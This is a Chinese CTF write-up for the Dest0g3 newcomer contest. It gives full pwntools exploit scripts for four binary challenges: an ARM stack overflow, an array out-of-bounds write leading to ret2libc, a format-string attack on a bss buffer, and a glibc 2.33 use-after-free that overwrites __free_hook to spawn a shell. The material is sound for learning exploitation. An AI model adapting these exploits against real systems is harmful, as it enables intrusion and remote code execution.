Dest0g3迎新赛wp及其复现

写在前面：

由于这段时间比较忙，本人并未做全部题目，只写了部分，后面的题目有时间会补上的

ez_aarch

一道arm栈溢出，存在后门：

from pwn import *
context.log_level = 'debug'
def pwn():

	p = remote("node4.buuoj.cn",28172)
	p.recvuntil(b'Please leave your name:')
	p.timeout = 0.5
	pl1 = b'a'*(0x28) + b'\x3c'
	p.send(pl1)
	p.interactive()
pwn()

ez_pwn

存在数组越界漏洞，覆盖栈上数字下标变量即可：

from pwn import *
from LibcSearcher import * 
context.log_level = 'debug'
context.arch = 'i386'
# r = process("./ez_pwn")
r = remote("node4.buuoj.cn",27674)
e = ELF("./ez_pwn")
libc = e.libc

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.slafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))

def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

def get_sign32(vx):
    if not vx or vx < 0x80000000:
        return vx
    return vx - 0x100000000

ru(b'input the length of array:')
sl(b'-4294967297')

for i in range(12):
	ru(b'input your choice:')
	sl(b'1')
	ru(b'input num')
	sl(b'100')
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'17')

ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134516928')
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134517768') 
# dbg('b *0x804933D')
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134529044')

# dbg('b *0x804933D')
ru(b'input your choice:')
sl(b'100')
addr = uu32(b'\xf7')
print(hex(addr))




libc = LibcSearcher("puts",addr)
base = addr - libc.dump('puts')
print(hex(base))
sys = base + libc.dump("system")
sh = base + libc.dump("str_bin_sh")
sys = get_sign32(sys)
sh = get_sign32(sh)

ru(b'input the length of array:')
sl(b'-4294967297')

for i in range(12):
	ru(b'input your choice:')
	sl(b'1')
	ru(b'input num')
	sl(b'100')
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'17')

ru(b'input your choice:')
sl(b'1')
ru(b'input num')
print(hex(sys))
print(sys)
# dbg('b *0x804933D')

sl(str(sys).encode())
ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(b'134517768') 


ru(b'input your choice:')
sl(b'1')
ru(b'input num')
sl(str(sh).encode())

ru(b'input your choice:')
sl(b'100')

r.interactive()

dest_love

bss段格式化字符串，这题出题人没给libc，卡了很久

from pwn import *
from LibcSearcher import * 
context.log_level = 'debug'
# r = process("./pwn")
r = remote("node4.buuoj.cn",28742)
e = ELF("./pwn")
libc = e.libc

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.slafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

ru(b"What about your love to Dest0g3?\n")
se(b'aaa')
ru(b"What about your love to Dest0g3?\n")
se(b'aaa')

#leak
ru(b"What about your love to Dest0g3?\n")
se(b"%12$p%10$p")
text_base = int(rc(14),16) - 0x185 - 0x1000
leak("text_base",text_base)
stack = int(rc(14),16) - 0xd8
leak("stack",stack)
num = stack % 0x10000
print(hex(num))


ru(b"What about your love to Dest0g3?\n")
pl1 = "%{num}c%10$hn".format(num = num)

se(pl1)
target = text_base + 0x4010
num2 = target % 0x10000
print(hex(num2))

ru(b"What about your love to Dest0g3?\n")
pl2 = "%{num}c%39$hn".format(num = num2)
se(pl2)

ru(b"What about your love to Dest0g3?\n")
pl3 = "%1314520c%12$n"

se(pl3)

r.interactive()

ezuaf

很明显的漏洞uaf,但版本是2.33，之前没做过这个版本的，所以搜索了一下相关知识，也是做出来了

from pwn import *
from LibcSearcher import * 
# echo 0 > /proc/sys/kernel/randomize_va_space
local_file  = './uaf'
local_libc  = './libc-2.33.so'
# context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'
e = ELF(local_file)
context.arch = e.arch

select = 1
if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('node4.buuoj.cn',29477)
    libc = ELF(local_libc)

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.slafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))
gadget = [0x4f2c5,0x4f322,0x10a38c]
r.timeout = 0.5
def dbg(cmd):
    gdb.attach(r,cmd)
    pause()

def add(size,desc):
    ru(b': ')
    sl(b'1')
    ru(b'Please tell me its size:')
    sl(str(size).encode())
    ru(b'Content: ')
    se(desc)
def edit(index,desc):
    ru(b': ')
    sl(b'2')
    ru(b'Please tell me the index:')
    sl(str(index).encode())
    ru(b'Please tell me its content:')
    se(desc)
def dele(index):
    ru(b': ')
    sl(b'3')
    ru(b'Please tell me the index:')
    sl(str(index).encode())
def show(index):
    ru(b': ')
    sl(b'4')
    ru(b'Please tell me the index:')
    sl(str(index).encode())

def pwn():
    for i in range(9):
        add(0x80,b'/bin/sh\x00\x00'*2)
    dele(0)
    show(0)
    he0=uu64(b'\x00')
    print(hex(he0))
    dele(1)
    show(1)
    he1=u64(ru(b'\x00')[-7:].ljust(8,b'\x00'))
    print(hex(he1))
    heap=he0^he1
    leak("heap",heap)
   
    for i in range(2,8):
        dele(i)
    show(5)
    he=u64(ru(b'\x00')[-7:].ljust(8,b'\x00'))
    print(hex(he))
    show(6)
    he6=u64(ru(b'\x00')[-7:].ljust(8,b'\x00'))
    print(hex(he6))
    show(7)
    base=uu64(b'\x7f')-0x1e0c00
    leak("base",base)
    free_hook=base+libc.sym["__free_hook"]
    leak("free_hook",free_hook)
    sys=base+libc.sym['system']
    leak("sys",sys)

    add(128,b'aa')
    tagerheap=heap+0x2d0
    leak("target heap:",tagerheap)
    tagerheap_key=tagerheap^he
    leak("target heap_key:",tagerheap_key)
    libc_key=tagerheap_key+0x170
    leak("target libc_key:",libc_key)
    fd = free_hook^libc_key

    dele(6)
    edit(9,p64(fd)+b'\n')
    leak("free_hook",free_hook)
    add(128,b'/bin/sh\x00')
    add(128,b'/bin/sh\x00')
    edit(11,p64(sys)+b'\n')
 
    dele(6)

    r.interactive()



pwn()